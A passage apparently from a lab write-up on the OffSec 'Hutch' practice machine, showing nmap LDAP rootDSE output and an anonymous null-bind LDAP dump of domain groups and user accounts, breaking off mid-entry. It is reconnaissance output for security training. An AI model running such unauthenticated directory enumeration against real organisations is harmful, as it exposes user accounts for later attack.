SystemMemoryLimitPercent | supportedControl: 1.2.840.113556.1.4.319 | supportedControl: 1.2.840.113556.1.4.801 | supportedControl: 1.2.840.113556.1.4.473 | supportedControl: 1.2.840.113556.1.4.528 | supportedControl: 1.2.840.113556.1.4.417 | supportedControl: 1.2.840.113556.1.4.619 | supportedControl: 1.2.840.113556.1.4.841 | supportedControl: 1.2.840.113556.1.4.529 | supportedControl: 1.2.840.113556.1.4.805 | supportedControl: 1.2.840.113556.1.4.521 | supportedControl: 1.2.840.113556.1.4.970 | supportedControl: 1.2.840.113556.1.4.1338 | supportedControl: 1.2.840.113556.1.4.474 | supportedControl: 1.2.840.113556.1.4.1339 | supportedControl: 1.2.840.113556.1.4.1340 | supportedControl: 1.2.840.113556.1.4.1413 | supportedControl: 2.16.840.1.113730.3.4.9 | supportedControl: 2.16.840.1.113730.3.4.10 | supportedControl: 1.2.840.113556.1.4.1504 | supportedControl: 1.2.840.113556.1.4.1852 | supportedControl: 1.2.840.113556.1.4.802 | supportedControl: 1.2.840.113556.1.4.1907 | supportedControl: 1.2.840.113556.1.4.1948 | supportedControl: 1.2.840.113556.1.4.1974 | supportedControl: 1.2.840.113556.1.4.1341 | supportedControl: 1.2.840.113556.1.4.2026 | supportedControl: 1.2.840.113556.1.4.2064 | supportedControl: 1.2.840.113556.1.4.2065 | supportedControl: 1.2.840.113556.1.4.2066 | supportedControl: 1.2.840.113556.1.4.2090 | supportedControl: 1.2.840.113556.1.4.2205 | supportedControl: 1.2.840.113556.1.4.2204 | supportedControl: 1.2.840.113556.1.4.2206 | supportedControl: 1.2.840.113556.1.4.2211 | supportedControl: 1.2.840.113556.1.4.2239 | supportedControl: 1.2.840.113556.1.4.2255 | supportedControl: 1.2.840.113556.1.4.2256 | supportedControl: 1.2.840.113556.1.4.2309 | supportedControl: 1.2.840.113556.1.4.2330 | supportedControl: 1.2.840.113556.1.4.2354 | supportedCapabilities: 1.2.840.113556.1.4.800 | supportedCapabilities: 1.2.840.113556.1.4.1670 | supportedCapabilities: 1.2.840.113556.1.4.1791 | supportedCapabilities: 1.2.840.113556.1.4.1935 | supportedCapabilities: 1.2.840.113556.1.4.2080 | supportedCapabilities: 1.2.840.113556.1.4.2237 | subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | serverName: CN=HUTCHDC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=hutch,DC=offsec | schemaNamingContext: CN=Schema,CN=Configuration,DC=hutch,DC=offsec | namingContexts: DC=hutch,DC=offsec | namingContexts: CN=Configuration,DC=hutch,DC=offsec | namingContexts: CN=Schema,CN=Configuration,DC=hutch,DC=offsec | namingContexts: DC=DomainDnsZones,DC=hutch,DC=offsec | namingContexts: DC=ForestDnsZones,DC=hutch,DC=offsec | isSynchronized: TRUE | highestCommittedUSN: 75492 | dsServiceName: CN=NTDS Settings,CN=HUTCHDC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=hutch,DC=offsec | dnsHostName: hutchdc.hutch.offsec | defaultNamingContext: DC=hutch,DC=offsec | currentTime: 20220713194237.0Z |_ configurationNamingContext: CN=Configuration,DC=hutch,DC=offsec Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows ``` Null Bind ``` # extended LDIF # # LDAPv3 # base with scope subtree # filter: (objectclass=*) # requesting: ALL # # hutch.offsec dn: DC=hutch,DC=offsec # Administrator, Users, hutch.offsec dn: CN=Administrator,CN=Users,DC=hutch,DC=offsec # Guest, Users, hutch.offsec dn: CN=Guest,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Guest description: Built-in account for guest access to the computer/domain distinguishedName: CN=Guest,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104052540.0Z whenChanged: 20201104052540.0Z uSNCreated: 8197 memberOf: CN=Guests,CN=Builtin,DC=hutch,DC=offsec uSNChanged: 8197 name: Guest objectGUID:: VKtEAAOQ8ki8PKRBs7xH+A== userAccountControl: 66082 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 0 lastLogoff: 0 lastLogon: 0 pwdLastSet: 0 primaryGroupID: 514 objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGn9QEAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: Guest sAMAccountType: 805306368 objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec isCriticalSystemObject: TRUE dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 20201104052623.0Z dSCorePropagationData: 16010101000417.0Z # krbtgt, Users, hutch.offsec dn: CN=krbtgt,CN=Users,DC=hutch,DC=offsec # Domain Computers, Users, hutch.offsec dn: CN=Domain Computers,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: group cn: Domain Computers description: All workstations and servers joined to the domain distinguishedName: CN=Domain Computers,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104052623.0Z whenChanged: 20201104052623.0Z uSNCreated: 12330 uSNChanged: 12332 name: Domain Computers objectGUID:: SuBXv87h/Uq0hS9itdhc7g== objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnAwIAAA== sAMAccountName: Domain Computers sAMAccountType: 268435456 groupType: -2147483646 objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec isCriticalSystemObject: TRUE dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 20201104052623.0Z dSCorePropagationData: 16010101000417.0Z # Domain Controllers, Users, hutch.offsec dn: CN=Domain Controllers,CN=Users,DC=hutch,DC=offsec # Schema Admins, Users, hutch.offsec dn: CN=Schema Admins,CN=Users,DC=hutch,DC=offsec # Enterprise Admins, Users, hutch.offsec dn: CN=Enterprise Admins,CN=Users,DC=hutch,DC=offsec # Cert Publishers, Users, hutch.offsec dn: CN=Cert Publishers,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: group cn: Cert Publishers description: Members of this group are permitted to publish certificates to th e directory distinguishedName: CN=Cert Publishers,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104052623.0Z whenChanged: 20201104052623.0Z uSNCreated: 12342 memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offse c uSNChanged: 12344 name: Cert Publishers objectGUID:: 6pR13+h/v0CBSMnRpjymjA== objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnBQIAAA== sAMAccountName: Cert Publishers sAMAccountType: 536870912 groupType: -2147483644 objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec isCriticalSystemObject: TRUE dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 20201104052623.0Z dSCorePropagationData: 16010101000417.0Z # Domain Admins, Users, hutch.offsec dn: CN=Domain Admins,CN=Users,DC=hutch,DC=offsec # Domain Users, Users, hutch.offsec dn: CN=Domain Users,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: group cn: Domain Users description: All domain users distinguishedName: CN=Domain Users,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104052623.0Z whenChanged: 20201104052623.0Z uSNCreated: 12348 memberOf: CN=Users,CN=Builtin,DC=hutch,DC=offsec uSNChanged: 12350 name: Domain Users objectGUID:: 0zyAAvzt1UOKBKbf0N6FQQ== objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnAQIAAA== sAMAccountName: Domain Users sAMAccountType: 268435456 groupType: -2147483646 objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec isCriticalSystemObject: TRUE dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 20201104052623.0Z dSCorePropagationData: 16010101000417.0Z # Domain Guests, Users, hutch.offsec dn: CN=Domain Guests,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: group cn: Domain Guests description: All domain guests distinguishedName: CN=Domain Guests,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104052623.0Z whenChanged: 20201104052623.0Z uSNCreated: 12351 memberOf: CN=Guests,CN=Builtin,DC=hutch,DC=offsec uSNChanged: 12353 name: Domain Guests objectGUID:: 8IN1upAPCUqFJVGtzCE2ew== objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnAgIAAA== sAMAccountName: Domain Guests sAMAccountType: 268435456 groupType: -2147483646 objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec isCriticalSystemObject: TRUE dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 20201104052623.0Z dSCorePropagationData: 16010101000417.0Z # Group Policy Creator Owners, Users, hutch.offsec dn: CN=Group Policy Creator Owners,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: group cn: Group Policy Creator Owners description: Members in this group can modify group policy for the domain member: CN=Administrator,CN=Users,DC=hutch,DC=offsec distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104052623.0Z whenChanged: 20201104052623.0Z uSNCreated: 12354 memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offse c uSNChanged: 12391 name: Group Policy Creator Owners objectGUID:: CC/2IAwkpk+RkSicEUmVCA== objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnCAIAAA== sAMAccountName: Group Policy Creator Owners sAMAccountType: 268435456 groupType: -2147483646 objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec isCriticalSystemObject: TRUE dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 20201104052623.0Z dSCorePropagationData: 16010101000417.0Z # RAS and IAS Servers, Users, hutch.offsec dn: CN=RAS and IAS Servers,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: group cn: RAS and IAS Servers description: Servers in this group can access remote access properties of user s distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104052623.0Z whenChanged: 20201104052623.0Z uSNCreated: 12357 uSNChanged: 12359 name: RAS and IAS Servers objectGUID:: jwjGdt4Qfk2M0XMn8FMiVg== objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnKQIAAA== sAMAccountName: RAS and IAS Servers sAMAccountType: 536870912 groupType: -2147483644 objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec isCriticalSystemObject: TRUE dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 20201104052623.0Z dSCorePropagationData: 16010101000417.0Z # Allowed RODC Password Replication Group, Users, hutch.offsec dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: group cn: Allowed RODC Password Replication Group description: Members in this group can have their passwords replicated to all read-only domain controllers in the domain distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutc h,DC=offsec instanceType: 4 whenCreated: 20201104052623.0Z whenChanged: 20201104052623.0Z uSNCreated: 12402 uSNChanged: 12404 name: Allowed RODC Password Replication Group objectGUID:: 5ErycQkHo02pMg1/xxJNIQ== objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnOwIAAA== sAMAccountName: Allowed RODC Password Replication Group sAMAccountType: 536870912 groupType: -2147483644 objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec isCriticalSystemObject: TRUE dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 20201104052623.0Z dSCorePropagationData: 16010101000417.0Z # Denied RODC Password Replication Group, Users, hutch.offsec dn: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: group cn: Denied RODC Password Replication Group description: Members in this group cannot have their passwords replicated to a ny read-only domain controllers in the domain member: CN=Read-only Domain Controllers,CN=Users,DC=hutch,DC=offsec member: CN=Group Policy Creator Owners,CN=Users,DC=hutch,DC=offsec member: CN=Domain Admins,CN=Users,DC=hutch,DC=offsec member: CN=Cert Publishers,CN=Users,DC=hutch,DC=offsec member: CN=Enterprise Admins,CN=Users,DC=hutch,DC=offsec member: CN=Schema Admins,CN=Users,DC=hutch,DC=offsec member: CN=Domain Controllers,CN=Users,DC=hutch,DC=offsec member: CN=krbtgt,CN=Users,DC=hutch,DC=offsec distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch ,DC=offsec instanceType: 4 whenCreated: 20201104052623.0Z whenChanged: 20201104052623.0Z uSNCreated: 12405 uSNChanged: 12433 name: Denied RODC Password Replication Group objectGUID:: I0YqHi+34U+yrPKy8jL7YA== objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnPAIAAA== sAMAccountName: Denied RODC Password Replication Group sAMAccountType: 536870912 groupType: -2147483644 objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec isCriticalSystemObject: TRUE dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 20201104052623.0Z dSCorePropagationData: 16010101000417.0Z # Read-only Domain Controllers, Users, hutch.offsec dn: CN=Read-only Domain Controllers,CN=Users,DC=hutch,DC=offsec # Enterprise Read-only Domain Controllers, Users, hutch.offsec dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: group cn: Enterprise Read-only Domain Controllers description: Members of this group are Read-Only Domain Controllers in the ent erprise distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=hutc h,DC=offsec instanceType: 4 whenCreated: 20201104052623.0Z whenChanged: 20201104052623.0Z uSNCreated: 12429 uSNChanged: 12431 name: Enterprise Read-only Domain Controllers objectGUID:: xkuEQsOH+UekvpicNYDyqw== objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGn8gEAAA== sAMAccountName: Enterprise Read-only Domain Controllers sAMAccountType: 268435456 groupType: -2147483640 objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec isCriticalSystemObject: TRUE dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 20201104052623.0Z dSCorePropagationData: 16010101000417.0Z # Cloneable Domain Controllers, Users, hutch.offsec dn: CN=Cloneable Domain Controllers,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: group cn: Cloneable Domain Controllers description: Members of this group that are domain controllers may be cloned. distinguishedName: CN=Cloneable Domain Controllers,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104052623.0Z whenChanged: 20201104052623.0Z uSNCreated: 12440 uSNChanged: 12442 name: Cloneable Domain Controllers objectGUID:: IOOLFwbLHU+szn+H1kGShg== objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnCgIAAA== sAMAccountName: Cloneable Domain Controllers sAMAccountType: 268435456 groupType: -2147483646 objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec isCriticalSystemObject: TRUE dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 20201104052623.0Z dSCorePropagationData: 16010101000417.0Z # Protected Users, Users, hutch.offsec dn: CN=Protected Users,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: group cn: Protected Users description: Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId= 298939 for more information. distinguishedName: CN=Protected Users,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104052623.0Z whenChanged: 20201104052623.0Z uSNCreated: 12445 uSNChanged: 12447 name: Protected Users objectGUID:: mA4Fn/4sO0q/fsDXx5HOhg== objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnDQIAAA== sAMAccountName: Protected Users sAMAccountType: 268435456 groupType: -2147483646 objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec isCriticalSystemObject: TRUE dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 20201104052623.0Z dSCorePropagationData: 16010101000417.0Z # Key Admins, Users, hutch.offsec dn: CN=Key Admins,CN=Users,DC=hutch,DC=offsec # Enterprise Key Admins, Users, hutch.offsec dn: CN=Enterprise Key Admins,CN=Users,DC=hutch,DC=offsec # DnsAdmins, Users, hutch.offsec dn: CN=DnsAdmins,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: group cn: DnsAdmins description: DNS Administrators Group distinguishedName: CN=DnsAdmins,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104052702.0Z whenChanged: 20201104052702.0Z uSNCreated: 12486 uSNChanged: 12488 name: DnsAdmins objectGUID:: oohK2PE1PUydvjjBS/KBzw== objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnTQQAAA== sAMAccountName: DnsAdmins sAMAccountType: 536870912 groupType: -2147483644 objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z # DnsUpdateProxy, Users, hutch.offsec dn: CN=DnsUpdateProxy,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: group cn: DnsUpdateProxy description: DNS clients who are permitted to perform dynamic updates on behal f of some other clients (such as DHCP servers). distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104052702.0Z whenChanged: 20201104052702.0Z uSNCreated: 12491 uSNChanged: 12491 name: DnsUpdateProxy objectGUID:: QVU11mCC40GAeAjr+EUd7w== objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnTgQAAA== sAMAccountName: DnsUpdateProxy sAMAccountType: 268435456 groupType: -2147483646 objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z # Rosaline Placidi, Users, hutch.offsec dn: CN=Rosaline Placidi,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Rosaline Placidi distinguishedName: CN=Rosaline Placidi,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104053505.0Z whenChanged: 20201104053505.0Z uSNCreated: 12759 uSNChanged: 12763 name: Rosaline Placidi objectGUID:: ZnXcaol0h0O06eCHssgsaw== userAccountControl: 512 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 0 lastLogoff: 0 lastLogon: 0 pwdLastSet: 132489417051062737 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnTwQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: rplacidi sAMAccountType: 805306368 userPrincipalName: rplacidi@hutch.offsec objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z # Otto Patry, Users, hutch.offsec dn: CN=Otto Patry,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Otto Patry distinguishedName: CN=Otto Patry,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104053505.0Z whenChanged: 20201104053505.0Z uSNCreated: 12765 uSNChanged: 12769 name: Otto Patry objectGUID:: Z/B36x+G7EKQOh7bdq2Gdg== userAccountControl: 512 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 0 lastLogoff: 0 lastLogon: 0 pwdLastSet: 132489417052162728 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnUAQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: opatry sAMAccountType: 805306368 userPrincipalName: opatry@hutch.offsec objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z # Lyndsie Taunton, Users, hutch.offsec dn: CN=Lyndsie Taunton,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Lyndsie Taunton distinguishedName: CN=Lyndsie Taunton,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104053505.0Z whenChanged: 20201104053505.0Z uSNCreated: 12771 uSNChanged: 12775 name: Lyndsie Taunton objectGUID:: osEKgirap0C06Opb/Wc8lQ== userAccountControl: 512 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 0 lastLogoff: 0 lastLogon: 0 pwdLastSet: 132489417052642725 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnUQQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: ltaunton sAMAccountType: 805306368 userPrincipalName: ltaunton@hutch.offsec objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z # Arlyn Costello, Users, hutch.offsec dn: CN=Arlyn Costello,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Arlyn Costello distinguishedName: CN=Arlyn Costello,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104053505.0Z whenChanged: 20201104053505.0Z uSNCreated: 12777 uSNChanged: 12781 name: Arlyn Costello objectGUID:: OdMef64Ah0apX2/LyqiHYA== userAccountControl: 512 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 0 lastLogoff: 0 lastLogon: 0 pwdLastSet: 132489417053152725 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnUgQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: acostello sAMAccountType: 805306368 userPrincipalName: acostello@hutch.offsec objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z # Johnnie Sparwell, Users, hutch.offsec dn: CN=Johnnie Sparwell,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Johnnie Sparwell distinguishedName: CN=Johnnie Sparwell,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104053505.0Z whenChanged: 20201104053505.0Z uSNCreated: 12783 uSNChanged: 12787 name: Johnnie Sparwell objectGUID:: y1RU3ceaqEyn1XecBNhkVQ== userAccountControl: 512 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 0 lastLogoff: 0 lastLogon: 0 pwdLastSet: 132489417053772722 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnUwQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: jsparwell sAMAccountType: 805306368 userPrincipalName: jsparwell@hutch.offsec objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z # Ottilie Knee, Users, hutch.offsec dn: CN=Ottilie Knee,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Ottilie Knee distinguishedName: CN=Ottilie Knee,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104053505.0Z whenChanged: 20201104053505.0Z uSNCreated: 12789 uSNChanged: 12793 name: Ottilie Knee objectGUID:: /bMvDx/e506T4lQ+rB8/FA== userAccountControl: 512 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 0 lastLogoff: 0 lastLogon: 0 pwdLastSet: 132489417054332736 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnVAQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: oknee sAMAccountType: 805306368 userPrincipalName: oknee@hutch.offsec objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z # Joan McKendry, Users, hutch.offsec dn: CN=Joan McKendry,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Joan McKendry distinguishedName: CN=Joan McKendry,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104053505.0Z whenChanged: 20201104053505.0Z uSNCreated: 12795 uSNChanged: 12799 name: Joan McKendry objectGUID:: awivgHuoDEKrRWtvGV31rQ== userAccountControl: 512 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 0 lastLogoff: 0 lastLogon: 0 pwdLastSet: 132489417054922729 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnVQQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: jmckendry sAMAccountType: 805306368 userPrincipalName: jmckendry@hutch.offsec objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z # Alexia Victoria, Users, hutch.offsec dn: CN=Alexia Victoria,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Alexia Victoria distinguishedName: CN=Alexia Victoria,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104053505.0Z whenChanged: 20201104053505.0Z uSNCreated: 12801 uSNChanged: 12805 name: Alexia Victoria objectGUID:: pYkiH0wnEUGtTvJmed1oTQ== userAccountControl: 512 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 0 lastLogoff: 0 lastLogon: 0 pwdLastSet: 132489417055452791 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnVgQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: avictoria sAMAccountType: 805306368 userPrincipalName: avictoria@hutch.offsec objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z # Jane Frarey, Users, hutch.offsec dn: CN=Jane Frarey,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Jane Frarey distinguishedName: CN=Jane Frarey,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104053505.0Z whenChanged: 20201104053505.0Z uSNCreated: 12807 uSNChanged: 12811 name: Jane Frarey objectGUID:: ixEEnk99f0WcwVSNK+e+oA== userAccountControl: 512 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 0 lastLogoff: 0 lastLogon: 0 pwdLastSet: 132489417056032732 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnVwQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: jfrarey sAMAccountType: 805306368 userPrincipalName: jfrarey@hutch.offsec objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z # Editha Aburrow, Users, hutch.offsec dn: CN=Editha Aburrow,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Editha Aburrow distinguishedName: CN=Editha Aburrow,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104053505.0Z whenChanged: 20201104053505.0Z uSNCreated: 12813 uSNChanged: 12817 name: Editha Aburrow objectGUID:: +7Byu5JQuU2TfrLSegT8VQ== userAccountControl: 512 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 0 lastLogoff: 0 lastLogon: 0 pwdLastSet: 132489417056522726 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnWAQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: eaburrow sAMAccountType: 805306368 userPrincipalName: eaburrow@hutch.offsec objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z # Claus Luddy, Users, hutch.offsec dn: CN=Claus Luddy,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Claus Luddy distinguishedName: CN=Claus Luddy,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104053505.0Z whenChanged: 20201104053505.0Z uSNCreated: 12819 uSNChanged: 12823 name: Claus Luddy objectGUID:: XXbxCiLxHkKjA7Pd0VTq1A== userAccountControl: 512 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 0 lastLogoff: 0 lastLogon: 0 pwdLastSet: 132489417057032735 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnWQQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: cluddy sAMAccountType: 805306368 userPrincipalName: cluddy@hutch.offsec objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z # Arthur Gitthouse, Users, hutch.offsec dn: CN=Arthur Gitthouse,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Arthur Gitthouse distinguishedName: CN=Arthur Gitthouse,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104053505.0Z whenChanged: 20201104053505.0Z uSNCreated: 12825 uSNChanged: 12829 name: Arthur Gitthouse objectGUID:: PQ8QTFNtw0elgPkzWaOmHA== userAccountControl: 512 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 0 lastLogoff: 0 lastLogon: 0 pwdLastSet: 132489417057602730 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnWgQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: 